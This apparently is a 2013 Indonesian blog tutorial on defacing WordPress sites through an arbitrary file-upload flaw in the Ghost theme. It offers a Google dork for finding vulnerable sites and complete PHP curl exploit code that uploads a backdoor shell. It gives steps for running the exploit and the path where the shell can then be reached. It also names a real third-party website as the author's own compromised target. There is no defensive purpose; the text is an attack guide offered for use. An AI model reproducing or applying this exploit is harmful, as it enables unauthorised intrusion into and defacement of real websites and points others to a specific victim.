Rabu, 20 November 2013

CARA DEFACE DENGAN TEKNIK WORDPRESS GHOST THEME FILE UPLOAD

kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416


Cara deface kali ini membutuhkan bantuan XAMPP

Download XAMPP : DISINI

Google Dork : inurl:wp-content/themes/Ghost/

Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )




Sekarang Copy Exploitnya

<?php
$uploadfile="yourFile.php";
$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Lalu yourFile.php diganti dengan nama shell backdoor kalian yang sudah di masukan ke dalam folder xampp>php

Disini nama shell saya 007.php

dan juga masukin target nya dengan mencari mengunakan dork yang tadi

disini saya mendapat target http://www.hibra.com.ar/

sekarang kita hanya perlu menambahkan

/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php


Dan bila ada tulisan {"status":"NOK", "ERR":"This file is incorect"}

itu biasa nya VULN

setelah itu simpan...disini saya simpan dengan nama x.php

sekarang kita buka CMD

buka exploit tersebut mengunakan CMD

 karna saya simpan dengan nama x.php jadi untuk membuka nya php x.php


Bila muncul seperti ini berarti berhasil

Untuk shell Acces berada disini http://site.com/wp-content/uploads/settingsimages/namashell.php

Karna nama shell saya 007 jadi membuka shell nya http://www.hibra.com.ar/wp-content/uploads/settingsimages/007.php 


semoga bermanfaat :D 


Posting Lebih Baru Posting Lama Beranda

0 komentar:

Posting Komentar